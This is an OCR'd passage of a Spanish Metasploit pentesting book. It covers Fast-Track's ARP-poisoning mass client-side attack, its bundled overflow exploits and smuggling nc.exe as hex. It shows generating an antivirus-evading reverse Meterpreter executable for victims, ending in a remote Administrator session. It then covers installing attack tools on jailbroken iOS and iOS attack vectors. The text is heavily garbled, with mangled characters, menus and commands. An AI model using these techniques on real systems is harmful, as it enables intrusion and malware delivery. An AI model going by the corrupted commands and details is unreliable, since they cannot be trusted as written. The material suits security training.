1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND) 
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED) 
3. SQL Injection single URL exploitation 


Fig 7.15: Menú de SOLPwnage, 


236: Metasploit para Pentesters 


Mass Client-Side Attack 

Esta funcionalidad proporciona al usuario la posibilidad de utilizar un servidor web que cargue 
distintos exploits y que éstos sean lanzados cuando una víctima potencial se conecte al servidor web. 
Esta funcionalidad es equivalente a la técnica browser autopwn, la cual se utilizaba en este libro para 
la distribución de malware en internet. 


Esta funcionalidad, además, permite realizar un ataque de ARP Spoofing a la víctima, si ésta se 
encontrase en el mismo segmento de red que el atacante. Con esta acción se busca controlar la 
comunicación de la víctima. El АКР Spoofing es provocado por la utilización de Fast-Track de la 
herramienta Ettercap. 


Would you like to use ettercap to ARP poison a host yes or no: yes | 


Ettercap allows you to ARP poison a specific host and when they browse 
a site, force them to use the metasploit site and launch a slew of 
exploits from the Metasploit repository. ETTERCAP REQUIRED. 


What ІР Address do you want to poison: 192.168.0.66 


Fig 7.16: Configuración de ARP Spoofing. 


La elección del payload es una situación, que como se ha comentado en este libro en varias ocasiones, 
es realmente importante, Esta funcionalidad permite elegir cuatro opciones de payload, que no dejan 
de ser los más conocidos, e incluso, los más utilizados. 


Specify your payload: 


1. Windows Meterpreter Reverse Heterpreter 
2. Generic Віла Shell 
3. Windows YNC Inject Reverse ТСР (aka “Da Gui") ! 


4. Reverse TCP Shell 
| Enter the number cf the payload you want: Ё | 


Fig 7.17: Elección de payload en Mass Client-Side Autack. 


Tras ir respondiendo a las sencillas cuestiones que produce Fast-Track para configurar el ataque 
se pueden visualizar dos ventanas nuevas, la primera es la del servidor configurado y preparado 
para recibir las peticiones, y la segunda es en la que se realiza el ARP Spoofing, en caso de haber 
seleccionado su configuración. 


du: (Rekdk) р 
аси P poisoning yiotiha? 


Starting HTTP Server on 192,168,0,65 port 80 | l | d 
| 
4 


t а a 
¡O GROUP-2 АҢ (all the hoste in the tist) 
]Startino Unified Ріпа оз ps 


de Have sonsons connect to бон оп 192,168,0;65 port BO ##® 
7 : s tE : 
Type <cantroló-o to etta: > ү 4 о j 
B esText- only: Interface activated, ,, 
Ў {Hit "не For inline help 


10. 
Fig 7.18: Ventanas del ataque Mass Client-Side. 
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Exploits 
Esta funcionalidad proporciona un número de exploits codeados en Python, Estos 
ser encontrados en la ruta ¡pentest/exploits/fasttrack/bin/exploits. En la ima | 


xploits pueden 


| { | Бел se visualiza el listado 
de exploits que Fast-Track detecta, pero dicha lista puede ser fácilmente ampliada | 


This section will attempt to com 


pile some exploits coded in python 
these exploits are from Nuts, bu . на: 


t may add others in time, 


Select your exploit: 


НР OpenView Network Node Manager CGI Buffer Overflow 

IBM Tivoli Storage Manager Express CAD Service Buffer Overflow 
НР Openview NNN 7.5.1 OVAS.EXE Pre Authentication SEH Overflow 
Quicktime 7.3 RTSP SEH Buffer Overflow 

Goodtech SSH Server 6.4 Buffer Overflow 

508-967 Microsoft Server Service Remote Buffer Overflow 

MAC 6.34 Remote Buffer Overflow Exploit 

TFTP Server for Windows V1.4 ST 

Internet Explorer XML Corruption Buffer Overflow 

18. MS Internet Explorer 7 Memory Corruption Exploit (569-002) . 
11. M5 Internet Explorer 7 DirectShow {msvidctl. dll) Heap Spray 
12. FireFox 3.5 Heap Spray Vulnerability 


40 D зм пл їл a (adn ка 


(q)uit 


¡Enter number: Я 


Fig 7.19: Listado de exploits por defecto que presenta Fast-Track. 


Fast-Track proporciona para el exploit que se quiera configurar, un sencillo paso a paso para 
configurarlo. Gracias a esto, el usuario puede preparar un entorno de prueba para comprobar la 
eficiencia del exploit en un rango temporal inferior a la configuración manua! del módulo del exploit 
con Metasploit. 


Binary to Hex Payload Converter 

El conversor de binario a hexadecimal que presenta Fast-Track permite generar las instrucciones en 
hexadecimal, siempre y cuando el archivo ejecutable se encuentre por debajo de 64 Kb de tamaño. 
Este conversor se puede utilizar cuando el atacante ya tiene acceso a un sistema comprometido y se 
necesita enviar un ejecutable. | 


Generalmente, los puertos de FTP y otros protocolos de transferencia de archivos se encuentran 
filtrados por los cortafuegos, por lo que este método proporciona una manera alternativa de lograr 
este objetivo. 


Fast-Track dispone de la opción del conversor y devuelve un archivo de texto con el formato 
específico de depuración de sistemas Windows. Este archivo es el que reconstruirá el ejecutable una 
vez que se encuentre en el sistema de la víctima o en la máquina fisica. 


Una vez logrado lo anterior, sólo se tiene que pegar en una ста о desarrollar un script рага conseguir 
ejecutar esto en el sistema afectado del cual ya se proveía de acceso. 


тч чанана 
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Binary to Hex Generator v0.1 


This menu will convert an exe to а hex file witick you just need 
to copy and paste the output to a windows command prompt, it will 
then generate an executable based on your payload 


*+*Note** Based on Windows restrictions the file cannot be over 64kb 
<ctrl>-c to Cancel 


Enter the path to the file to convert to hex: /root/nc.exe 
ANO Г лыйк EN REA RN INN 


Fig 7.20: Conversión del binario nc.exe a hexadecimal en el archivo binarypayinad. txt. 


Payload Generator 

la funcionalidad de Payload Generator es común en distintas herramientas que utilizan el 
Jramework de Metasploit, por ejemplo en SET, Social Engineering Toolkit. Este generado: de 
payload ejecutables o shellcodes ayuda de manera sencilla al usuario a lograr archivos ejecutables, 
encodeados para intentar evitar antivirus, IPS o IDS, o incluso obtener el código o shellcode para 
utilizar en exploits propios, 


Fast-Track presentará al usuario distintos menús de navegación con ciertas preguntas, como son la 
elección del payload, la elección del encoder o si se quiere crear un listener a través del módulo de 
Metasploit exploit/multi/hhandler. 


PoC: Generación de payload con Fast-Track 

El escenario de la siguiente prueba de concepto es una recopilación de lo estudiados o comentado 
anteriormente en este libro. El atacante utilizará la herramienta Fast-Track para generar un payload 
de tipo ejecutable, el cual será enviado a las potenciales víctimas a través de algún medio telemático. 
Este medio se deja a la imaginación del lector, siendo posibles candidatos, el correo electrónico, un 
servidor web mediante enlace a un recurso malicioso, un pendrive entregado a las víctimas, etcétera. 


Fast-Track proporciona un menú con distintas funcionalidades, la opción Payload Generator 
mostrará las cuestiones que deben ser respondidas por el usuario. 


Fast-Track Main Menu: 


Fast-Track Updates 
Autopwn Automation 
Nmap Scripting Engine 
Microsoft SOL Тоді 5 
ass Client-Side Attack 
Exploits 
Binary to Hex Payload Converter 
Payload Generator 
Fast-Track Tutorials 
10. Fast-Track Changelog 
11. Fast-Track Credits 
. Exit Fast-Track 


1D cu un) мз 


Enter the number: 8 


Fig 7.21: Elección de la opción Payload Generator. 
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Еп la elección del payload se- podrá elegir entre los clásicos Meterpreter, shell, etcétera. Para egu 


prueba de concepto se elige la opción de Meterpreter, el cual es denominado “el rey de los paylog 
| р 1 ads 


| What payload do you want to generate: і 


Name: Description: ' | 


\ 


1. Windows Shell Reverse ТСР Spawn a command shell en victim and send back to attack 


er, 
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send hack to at 


кй 
‚ Windows Reverse ТСР VNC BLL Spawn а УНС server on victim and ѕеп back to attacker. 
4. Windows Bind Shell Execute payload and create an accepting port on remote 
system. 


«ctri>-c to Cancel 


Enter choice (example 1-6): 1 


Fig 7.22: Elección del payload para el archivo final. 


Tras la elección del payload, Fast-Track muestra las opciones que se pueden utilizar para ofuscar @ 
encodear el archivo ejecutable, con el fin de evadir a los posibles sistemas de antivirus, por ејетрі Y 


El encoder utilizado en esta prueba es Shikaia_ga_nai, el cual realizará cuatro iteraciones sobré á 
código del payload. Este encoder genera buenos resultados en ta lucha contra la evasión de sistema 
de protección. 


і 


Below is а list of encodings te try and bypass AV. 


Select one of the below, Avoid UTF8_tolower usually gets past them.] 


. avoid utf8_tolower 

. shikata ga nai 

. älpha mixed 

‚ alpha_upper 

. call4_dword_xor 

. countdown 

‚ Fnstenv_mov 

jmp_cell_additive 
y. попа\рћа 
160, попиррег 
11. unicode_mixed 
12. únicode upper 
13. alpha2 

ү Но Encoding 


— 
с w сл Мп у> 62 N юе 


| Enter your choice : 2 
Fig 7.23: Elección del encoder para el archivo final. 


Por último, y antes de realizar el despliegue del fichero mediante el uso de alguna vía de comunicació 
mencionada anteriormente, se debe responder a unas cuestiones. Fast-Track permite que el códigd 
que se genere sea para inyectarlo en un exploit que se esté desarrollando, por ejemplo mediante un 
shellcode. Otra opción es crear un ejecutable donde se encuentre el payload que se quiere utilizan 

En esta prueba de concepto se ha utilizado la segunda opción, que consiste en la creación de ud 
ejecutable con inyección de payload. 


А 


Metasploit рака Pentesters 


Enter ІР Address of the listener/attacker (reverse) or host/victim (bind shell): 192,168,1,3 


Enter the port of the Listener: 4444 


Do you want to create ап EXE or Shellcode 


1. Executable 
2. Shellcode 


Enter your choice: 1 
/bin/sh: /pentest/exploits/framework3/msfpayload: No such fite or directory 


A payload has been created in this directory and is named 'payload.exe'. Enjoy! 


Do you want to start a listener to receive the payload yes or no: no 


[їр 7.24: Configuración del payload 


En esta prueba se puede visualizar como Fast-Track pregunta al usuario si quiere montar y configurar 
un listener para recibir las sesiones inversas. Si el usuario elige “sí”, entonces se ejecutaria Metasploit 
y se configuraría automáticamente el handler. En esta ocasión se ha decidido responder con “no” а 
la pregunta de Fast-Track y configurar manualmente el módulo exploit/multi/handier. 


[+3 Sending stage (752128 bytes) te 192.168.1.40 | 
[+] Meterpreter session 1 opened (192.168.1.41:4444 -> 192,168.1.40:1561) at 2012-09-28 21:32:44 
+0288 


meterpreter > getuid 
Server username: PRUEBAS-017698CCYAdministrador 


eterpreter > 


Fig 7.25: Obtención de sesión inversa en la máquina remota. 


6. Conciencia sobre Fast-Track 


En definitiva Fast-Track es una herramienta de automatización que ofrece una gran cantidad de 
posibilidades, gracias a la riqueza que aporta Metasploit Framework. Fast-Track se combina con 
Metasploit para permitir al usuario menos avanzado utilizar y configurar de manera sencilla vectores 
de ataque con los que poder comprometer máquinas remotas. 


Cabe destacar que los vectores de ataque automatizados no siempre tienen éxito. Esta afirmación es 
lógica, ya que un vector de ataque es una vía o posibilidad para acceder o tomar el control de una 
máquina remota. Hay que entender lo que realmente está realizando el sistema que está atacando a 


la máquina víctima. También es interesante entender cuántas posibilidades de éxito tiene el vector 


de ataque antes de lanzarlo. 


En conclusión, Fast-Track ayuda a preparar el entorno en un tiempo, casi record, de tres minutos 
o menos. Pero, puede ocurrir que la capacidad para realizar pruebas de forma manual produzcan 
mejores resultados en el sistema remoto, por lo que no hay que dejar de lado las pruebas manuales, 
ni dejar de entender lo que está sucediendo sin que el usuario sea consciente de ello, “por debajo”. 
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7. Reflexión sobre herramientas externas a Metasploit 


En estos dos últimos capítulos se han estudiado y ejemplificado, mediante la escenjficación de 
pruebas de concepto, dos de las herrámientas más conocidas para automatizar tareas cop, ef objetivo 
de realizar una intrusión en un sistema. [ 


Como se ha podido estudiar Fast-Track y SET o Social Engineering Toolkit son dos herramientas 
muy distintas, pero con un denominador común que es Metasploit. Ambas herramientas utilizan la 
versatilidad del framework para generar un mundo falso, ya sea por medio de sitios web, ejeculables 
que no hacen lo que parece, correos electrónicos que parecen reales y no lo son, etcétera. 


En el mundo falso que este ро de aplicaciones son capaces de crear, la víctima debe tener mucho 
cuidado ya que ésta actuará como si fuera un mundo real. De esta manera se provoca que la víctima 
ejecute archivos que no deba, visite sitios que no son reales o confíe en correos electrónicos que no 
son los adecuados. 


Estadisticamente SET es más utilizado en el mundo de los test de intrusión que Fast-Track. Este 
hecho, puede ser el resultado del objetivo con el que se desarrolló SET y las funcionalidades de 
ingeniería social que éste aporta al usuario que lo utiliza. Fast-Track tiene un objetivo enfocado a 
facilitar al usuario іа interacción y configuración de ataques avanzados de Metasploit. SET también 
proporciona métodos para configurar algunos ataques avanzados, pero siempre enfocado al аме de 
la ingeniería social. 


Por último comentar que la automatización es necesaria y recomendable, pero ésta también tiene 
cosas negativas como es la pérdida de control sobre lo que está sucediendo. Todas las acciones que 
proponen SET y Fast-Track se pueden realizar sin la automatización, es decir, manualmente, En 
general es recomendable utilizar la automatización cuando el usuario conozca muy bien el proceso 
manual y por esta razón es importante conocer las operaciones que se están utilizando por debajo, 


- 


que en el caso de Fast-Track, esto se traduce en conocer bien el entorno de Metasploit Framework. 


Como se ha podido estudiar en estos dos capítulos, Metasploit puede ser la semilla de un test de 
intrusión, provocando que gran cantidad de pruebas y procesos se puedan implementar gracias al 
framework. 


Capítulo VRI. Metasploit en dispositivos móviles 


Capítulo УШ 
Metasploit en dispositivos móviles 


1. Introducción 


Abordar el (ета de Metasploit y los dispositivos móviles es un asunto que se puede afrontar desde 
diferentes puntos de vista. Los dispositivos móviles como iPhone о iPad con ¡OS о Android, pueden 
encontrarse en ambos lados del espejo, es decir, pueden ser tanto los utilizados por el pentester como 
los utilizados por la víctima y en ambos casos puede ser vital conocer su funcionamiento para poder 
sacar el máximo provecho de ellos. 


Desde el punto de vista del pentester, poder disponer de un framework como Metasploit instalado 
en un terminal móvil puede permitir que se esté realizando todo un test de intrusión desde la WiFi 
de la empresa, mientras se está esperando en la sala de espera o paseando por las instalaciones en 
una visita guiada, De hecho, en las instalaciones de alta seguridad todos los dispositivos móviles 
se encuentran más que prohibidos por este tipo de motivos, y todos los visitantes deben dejarlos 
encerrados en unas cajas de seguridad a la entrada que actúan como jaulas de Faraday. Por otro lado, 
cada vez es más cómún que un dispositivo móvil guarde información sensible de un objetivo que no 
está disponible en otro lugar, por lo que puede ser necesario atacar un terminal Android о ¡OS para 
obtener dicha información y sacar esos datos. No hay que perder de vista que CEOs de empresa, 
políticos y hasta jueces, utilizan sus iPads, por ejemplo, para trabajar diariamente, 


Atacar los datos de estos terminales se puede enfocar desde tres aproximaciones distintas, para las 
que es necesario trazar diferentes planes de trabajo. 


- La primera de las aproximaciones sería atacar el terminal con un exploit remoto del 


mismo, que permitiera tomar control del termina] y obtener una shell o instalar un troyano 
para controlar el equipo, | 


La segunda de ellas sería atacar las comunicaciones del terminal aprovechando conexiones 
a través de redes inseguras del dispositivo, ya sean redes WiFi o de comunicaciones GPRS, 
Dentro de estos ataques, también es conveniente hacer notar el impacto de los ataques de 
Juice Jacking para robar fotografías y vídeos de la tarjeta de memoria de los dispositivos. 


- La última consiste en atacar el backup del terminal que puede haberse hecho en una 
máquina insegura о en ¡Cloua, algo que permitiría acceder a los datos del equipo en la nube, 
lo que haría posible obtener datos de extrema sensibilidad del usuario, 
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A lo largo de este capítulo se van a comentar las diferentes aproximaciones utilizando Metasploit 
como herramienta de apoyo donde sea posible, 


2. Instalación de Metasploit en dispositivos ¡OS 


A continuación se explicará la manera de instalar el framework de Metasploit en un dispositivo 
móvil como ¿Phone para poder auditar desde cualquier lugar. El requisito a la hora de realizar 
este proceso es disponer de un dispositivo ¿OS con jailbreak, ya que по se pueden conseguir estas 
herramientas por los canales habituales, 


Requisitos previos e instalación | | т 
Se debe conectar de algún modo con el ¡Phone para poder realizar las operaciones necesarias para 
la instalación de Metasploit. La vía más recomendable, segura y cómoda es conectarse шне 
terminal SSH, ya sea en el mismo dispositivo escribiendo comandos con el iPhone, o utitizándolo 


en Мас OS X, Linux o Windows. 


` А 5% t: A 4 Sl Ал 
En este ejemplo se ha utilizado el terminal Ригу, que será con el que se realizará la instalación 
completa y el principal manejo de Metasploit. En caso de tener instalado OpenSSH en un dispositivo 
iPhone, siempre es ideal tenerlo bien fortificado. Una vez realizada la conexión mediante SSH, se 
procederá a la instalación de los paquetes y aplicaciones necesarias para la instalación de Metasploit 
y SET. 


Para poder proceder con el proceso de instalación de Metasploit es necesario cumplir los requisitos 
previos de los componentes. Por ello, se instalarán aplicaciones necesarias, que son: subversión, 
nano, wget y phyton. 


En las siguientes capturas se observan las instrucciones а ejecutar para instalar los distintos 
componentes: 


i¡Phone-de-Pablo-Gonzalez:/private/var rooté apt-get install suversion nano wget 


Fig 8.01: Instalación de subversion, nano y wget. 


iPhone-de-Pablo-Gonzalez:/var/ímobile root cd /private/var/M 


Fig 8.02: Elección de punto de descarga de Metasploit en /private/var. 


A continuación, y una vez situados en el directorio de descarga seleccionado, se proceda a descargar 
el paquete ruby. Esto se realizará mediante el programa wget que se desempaquetará e instalará con 
el comando dpkg -i. 


Capitulo VII. Metasploit en dispositivos móviles 


iPhone-de-Pablo-Gonzalez:/private/var root 


:/fapc.saurik.com/cydia/del 
bs/ruby_1.8.6-p111-5 iphoneos-arm.deb 


--2911-01-04 11:20:06-- htco://apt.saurik.com/cydia/debs/raby 1.8.6-p111-5_ iphe 
пеоз-атњ. бер 


Resclving apt.suvrik.com... 74,208.10.249 | | 
j 


f wget http 


Connecting to apt .saurik.com}T4.208.10.249]:80... connected. 

НТІВ request sent, awiting response... 302 Moved Temporarily’ 

tocarian: hctp://cache.saurik. com/debs/ruby_1.B.6-p111-5 iphoneos-arm, дер jiolle 

zing) 

72011-01094 11:20:06-- кш эшш иш ыыы. 

varm, deb 5 

Resolving cache.savrik.com... 93,188.132.17, 93.288.132.25 | 

Connectíng to cache. saurik.com)93.188.132.17/:80... connected. i | 

НТТР request sent, awaiting response... 200 OK . A Н 

Lenoth; 1719319 (1.6M) iapplication/actet-atream] Я | | 
| 
4 


ВЕ Бе: "ruby 1.8.6-р111-5 iphoneos-arm.deb' 


Jy алаа 812,093 206K/a ea és 8 


Fig 8.03: Descarga de Ruby. | 


in. det Е 
[Reading database .., 3559 Piles and directories currently installed, } 
Preparing to replace ruby 1.8.8-р111-5 (using тиру 1.8.6-p111-5 iphoneos-axm.deb 


an ram 2:/privete/var тойс dpkg -i ruby ї,8.ё-р111-5 iphoansas a] 
| | 
ЖЕТ i 
Unpacking repiacement ruby ... | 
Setting up гару (1.6.6-р112-5) . 3 
H 
¿ 


ifnone-de-Pabio-Gonzalez:/private/var root 


O 


Fig 8.04: Desempaquelado e instalación de Ruby. 


Después se instala rubygems, un componente necesario en Metasploit, con la aplicación apt-get. 


Е е rr 
iProne-ae-Fablo-Gonzalez:/private/ 


var root apt-get install rubygens 
Reading package lista... Done | 
Buiiding dependency tree І ł 
Reading state information... Done А . | 
Мосе, selecting ruby instead of rubygems 


The following packages wi11 be upgraded: 
ruby 
1 upgraded, 0 newly installed, 0 to remove and 18 not upgraded. 
Need to дес 0B/3782kB of archives. у 
After this operation, 15.8ИВ af additional disk space will be used. 
(Reading database ... 8559 files and directories currently instalied,) 
Preparing to replace ruby 1.8.6-р111-5 (using «+. ./ruby 1.2.2-p0-10 iphoneos-arm. 


Fig 8.05: Instalación de rubygems. 


Una vez que se hayan instalado todos los prerequisitos se podrá pasar a la fase de instalación de 
Metasploit, para ello, se debe descargar e instalar el paquete .deb de Metasploit. 


iPhone-de-Pablo-Gonzaález:/private/var root wget Р таалам 
ata/releases/framework-3,5.1.tar.bz2 


--2011-01-04 11:28:42-- hctp://updates.metasploit.com/data/releases/framevork- 
.5.1.саг.рх2 


Resolving updates.metasploit.com... 384.154.104.2 | 
, Connecting са updates .metasploit.comj184.154.104.2/:80... connected. 

HITE request sent, awaiting respoñse... 200 OK 

Length: 43340987 (4110 fapplication/x-bzip2] 

Saving to: "framework-3.5.1.tar.bz2* | 


0+ [ ] 119,919 54. 6K/a E 
Fig 8.06: Descarga del paquete Metasploit con wget desde la web del proyecto. 


Como ejemplo se añade además una imagen con la instalación en un ¡Pad. 
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Fig 8.07: Metasploit funcionando en un ¿Perl 


Instalación del módulo SET (Social Engineering Toolkit) en iOS 
Рага proceder con la instalación de S.E.T , se debe cambiar de directorio en el dispositivo móvil y 
situarse de nuevo en la dirección /private/var. Una vez allí se debe ejecutar el siguiente comando 
рага añadir el módulo SET: 


/privale/var гооёё svn со http: //svn.trustedsec.com/social engineering toolkit: 
set/ ; 


Una vez realizado este paso, hay que situarse еп el directorio SET y ejecutar la orden ./set aceptando 
la instalación de todos los módulos de Python que se requieran. En este momento ya estará preparado 
para funcionar, tanto el framework de Metasploit como SET en el dispositivo iOS. 


1Phone-de-Pablo-Gonzalez:/private/var/SET roort ./ser 


„аа tdo do. 
AEREO. AREA Н... 


[---1 The Social-Enginear Toolkit (SET) DE aa 
{---} Written by David Kennedy (Берли) fem 4 
lr] Version: 1.1.1 Lt 
[ег] Codename: "Happy Но1їйлүз' Lo.) 
Кеды Report bugs со: davekfsocial-engineer.org feee] 
E-- 3 Follow Me On YXwictez: dave_relik [---] 
реле Homepage: http://www. зестапіас, com г} 
[===] Eramework: http://www. social-engiñeer, org Pam] 


Weicome to the Socisl-Engíneer Toolkit (SET). Yovr one 


stop shop for all of your social-engineering needs.. 


Fig 8.08: SEP ejecutándose en un iPhone. 
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Instalar Fast-Track en ¡OS 


En ТО$ también es posible instalar Fast-Track. Para ello se utilizará subversion ejecutando desde la 
línea de comandos la siguiente orden: 


/private/var гоо! зуп co http: //svn.thepentest.com/fasttrack/ 


А continuación habrá que ejecutar el instalador con la siguiente orden: 


/private/var root python setup.py install 


rast-Track realizará una serie de preguntas habituales del proceso de instalación y una vez acabado 
el proceso completo, existirán dos módulos para manejar Fast-Track, o bien еп modo de texto 
interactivo o bien con una interfaz senciila para utilizar vía web. Para arrancar Fast-Track en cada 


‚ móduio se ejecuta ta siguiente orden: 


*private/var коой python ./fast-track.py -i (ejecución mediante shell) 
¿private/var root! python ./fast-track.py -g (ejecución mediante webGUT) 


asr-Track ayuda a automatizar el proceso de pentesting, formando parte del kit de herramientas de 
| 
auditoría que se pueden ejecutar desde un dispositivo ¡OS рага trabajar desde cualquier lugar, 


3. Ataques en dispositivos iOS 


Atacar el terminal con un exploit remoto: El caso de ¡OS 
51 se busca en los módulos de Metasploit, se encuentra que a día de hoy по hay ningún exploit para 
terminales 105, con lo que iPad, iPhone, Apple ТУ y los iPod Touch quedarían fuera de los posibles 


.largeís. Por supuesto, ta no existencia de estos exploits que permitan tomar control remoto de los 


terminales Apple no quiere decir que sean invulnerables, ni mucho menos, es sólo que los exploits 
de ¡OS tienen un valor mucho mayor en la comunidad del jailbreak y en el mercado actual, por lo 
que no aparecen muchos públicos. 


La superficie de exposición de un terminal ¡OS de Apple es bastante reducida, y se compone del 
navegador Mobile Safari, el cliente de correo, el cliente SMS, los plugins que se puedan cargar en 
estas aplicaciones y poco más. El resto de aplicaciones utilizan peticiones de conexión al sistema 
Operativo que es quién realiza las solicitudes de datos. Debido a esto, los sistemas para tomar control 
de un terminal ¿OS han sido siempre muy limitados. El investigador Charlie Miller, a lo largo de los 
años ha ido encontrando diferentes fallos en el navegador o en el sistema de SMS para conseguir 
ejecutar código arbitrario en el dispositivo y tomar el control del mismo. 


En el último Mobile Pwn20wn de septiembre е 2012, los investigadores Daan Keuper y Joost Pool 
encontraron un fallo en el navegador Mobile Safari que les permitió tomar contro! de los dispositivos 
¡OS. Sin embargo, casi ninguno de esos exploits es público, y sólo se han dado explicaciones de 
cómo se han realizado, utilizándose esta información para poder hacer herramientas de jailbreak. 
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En el año 2012, la revista Forbes hizo un estudio de cuales eran los exploits mejor pagados, y los 
de los terminales ¡OS superaban con creces a todos los demás por encima de los de las máquinas 
Windows, que tradicionalmente habían sido los más cotizados en el mercado. 


: ADOBE READER +00 о $5,000+$30,000 
МАС OSX $20,000-$50,000 
"ANDROID УЛЫТ e $30,000-360,000 
FLASH OR JAVA BROWSER PLUG-INS $40,000-$100,000 
MICROSOFT WORD: о 8500006100000. ° > 
WINDOWS $60,000-$120.000 
«FIREFOX ОЯ SAFARI 27.172. $60000#4180000 
CHROME OR INTERNET EXPLORER $80,000-$200,000 
ю зу б? с *$100,000-$250,000: 


Fig 8.09: Lista de precios de exploits en el mercado. 


А pesar de que no hay ningún exploit en Metasploit, sí que se conocen muchos de los fallos que Пепе 
cada versión de 05, ya que Apple publica en cada nueva versión del sistema operativo la lista de 
códigos СУЕ solucionados, lo que puede ayudar a preparar un determinado ataque a un pentester, 


Una de las superficies de exposición comunes a iOS, Android y Windows Phone son las tiendas de 
aplicaciones. En el caso de Android el número de aplicaciones maliciosas que existen es enorme, 
рог Іо que casi no es noticia nueva. En el caso de ¿OS no son demasiadas las que se han encontrado, 
y casi todas han sido de robo de datos. 


El único ejemplo de una aplicación maliciosa instalada a través de la App Store es de Charlie 
Miller. Él hizo una prueba de concepto con una aplicación llamada /nstaStock que tras pasar los 
controles y estar publicada en la App Store e instalada en un dispositivo móvil, se convertía en 
un dropper(módulo de infección que descarga el auténtico software malicioso) para instalar un 
backdoor y controlar el teléfono remotamente, | 


to ЯЗАМ: de 2 
“InstaStock ` 


S Add а Ticker ARG | 2510.45 у 


*б65Рб 497087 7 


B 
[21 


Fig 8.10: InstaStock la Prueba de Concepto de Charly Miller que se saltó el Code-Signing a través de la AppStore 
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Aparte de esta prueba de concepto, lo más habitual son aplicaciones que roben datos, como la 
aplicación de adware Find & Call, que robaba las agendas de contactos para venderlas en ca mpañas 
de spam de correo electrónico y SMS. Por supuesto, hay que saltar los controles de Apple en la App 
Store, pero ya hay casos en los que es posible, 


En el caso de que el terminal tenga hecho el jailbreak, se ha eliminado el proceso de verificación 
de software firmado por Apple en el terminal, lo que permite que cualquier aplicación pueda ser 
ejecutada. En este caso es más sencillo instalar un software malicioso en el terminal, si 5 
al usuario de que instale una aplicación publicada en un repositorio de Internet. | 


e convence 


En la propia Cydia, el investigador español Eagle descubrió que una de las aplicaciones que había 
instalado en su terminal, y que procedía de Cydia, estaba haciendo clic-fiatd a través de su terminal 
móvil, algo que dejó en entredicho los controles de estas tiendas de aplicaciones para dispositivos ` 
con jailbreak. 


Existen casos de malware para equipos con jailbreak. Hay ejemplos como el gusano ¡Kee, que se 
distribuía vía OpenSSH con contraseñas por defecto (algo que es lo primero que hay que mirar en 
un terminal ¿OS con jailbreak), o ¡KeyGuard, un keylogger especialmente diseñado para ¡OS, que 
se distribuye por Internet para vigilar terminales ¿OS con jailbreak, en diferentes versiones y con 
distintas características. | 


Editions and Features 
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Fig 8.11: Versiones de ¡KeyGuard рага ¡OS 


Por supuesto, adaptar malware de OSX o Linux para sistemas ¿OS no es tan complicado si el lerminal 
tiene realizado el jailbreak, así que en ataques a medida son muchas las soluciones a emplear. 


Encontrar terminales con jaiblreak puede ser sencillo, sobre todo si estos utilizan las funciones que 
permiten algunos programas como Jastallous, de compartir datos vía servidores web. Buscando en 
Shodan equipos con Http cuyo banner muestre que es un ¿Phone es sencillo, y deja а las claras que 
es un terminal ¿Phone con jailbreak. Este mismo truco se puede realizar en un escaneo con птар 
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а la map 


en la red de una empresa, para ver si, o bien por SSH o bien por Http, se ha introducido un ¿OS боп 
jailbreak en la organización. 


La primera de las cosas que es interesante es que los dispositivos ¿OS informan en el campo User 
Agent de ia versión exacta del sistema operativo, con lo que únicamente consiguiendo que se cargue 
una imagen en un correo electrónico o se visite una página web, se logra conocer la versión exacta 
del sistema operativo objetiva de la acción. 
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Fig 8.12: Teminales ¡OS con jailbreak en Internet. 


En la última versión de ¿OS 6, el cliente Mail no carga las imágenes de ningún correo, pero permite 
hacerlo caso a caso, es decir, el usuario puede elegir cargar las imágenes de un mensaje de correo en 
particular escrito en HTML, pero en las versiones anteriores esto es algo que se hace a nivel giobal 
y por defecto estaba activado, lo que ayuda a conseguir la versión exacta de /05. 


Conocida la versión, es posible intentar localizar exploits públicos para terminales ¿OS utilizando las 
bases de datos CVE. CVE Details es una web que permite navegar рог los expedientes de seguridad 
de ¡OS que tienen un exploit públicado, lo que es de grán utilidad. En la imagen se puede ver una 
clasificación de los CVE que afectan a iOS, y sólo a iOS, ordenada por año de descubrimiento y por 
tipo de vulnerabilidad. 
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Si se selecciona la vista de bugs con exploits públicos, se puede ver que hay bastantes exploits 
disponibles para atacar a terminales ¿OS, y por supuesto se pueden configurar para utilizarlos en 
determinados entornos. 
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Fig 8.14: Lista de expedientes con exploit público. 


Entre ellos, hay que destacar el bug del PDF descubierto por Comex que fue utilizado, y aún está 
disponible, para JailbreakMe 3.0. Hay que recordar que este bug funciona en todos los terminales 
hasta versión ¡OS 4.0. 1. Dicho bug permite, mediante la apertura de un PDF ejecutar cód; go arbitrario: 
a nivel de roof en el sistema y, entre otras cosas, parchear el kernel de un terminal ¡OS para hacer 


Jailbreak. Sin embargo, es posible cambiar el payload y ejecutar uña shell a través del mismo, El 


investigador español José Selvi, realizó una demostración de esto con JailOwnMe. 
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Apple Safari on iPhona @$- 3,0,1 allows remote attackers to causa a denial. of service (application crash) via a long tel: URL in the SRC attribute 
of an IFRAME element, 
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Otra forma de atacar a los usuarios de ¿OS es mediante los bugs de Mobile Safari que permiten 
ocultar la barra de navegación para hacer ataques de phishing. Con SET, es posible crear diferentes 
sitios falsos para, mediante enlaces trucados suplantar sitios web. En las diferentes versiones de ¡OS 
se han ido descubriendo formas de hacer esto, por ejemplo, para ¿OS 5.1 se publico el CV£-2012- 
0674 que permitía con un sencillo código script ocultar la barra de navegación de Mobile Safari y 
colocar en su lugar una falsa, simulando así estar situado en otro sitio web, tal y como se ve en la 
imagen. 
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Fig 8.16: Address Bar Spoofing en iPhone. 


Hay que resaltar que, aunque el número de exploits disponibles en Metasploit para ¡OS sea nulo, el 
número de bugs que se publican en cada versión de 105 son muchos, por ejemplo, en ¡OS 6 se han 
solucionado 197 bugs, entre los que se encuentran el CVE- 2012-3730 descubierto por Ángel Prado 
para manipular los archivos adjuntos de mensajes de correo electrónico en Mail o el CVE-2012-3744 
descubierto por pod2g que permite hacer SMS Spoofing en un iPhone. 


En definitiva, si el objetivo es un terminal Apple con iOS, lo primero que hay que hacer es averiguar 
la versión de ¡OS en concreto, y a continuación buscar los exploits públicos o los fallos conocidos de 
esa versión para preparar un ataque a medida. 


Atacar las comunicaciones WiFi de dispositivos ¡OS 
Los terminales ¿OS adolecen de ciertas limitaciones en la gestión de las redes WiFi que los hace 
propensos a ataques de por medio de Rogue АР, y Rogue WiFi. Esta inseguridad existe principalmente 
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en la política de gestión de redes conocidas que realiza este sistema operativo a la hora de conectarse 
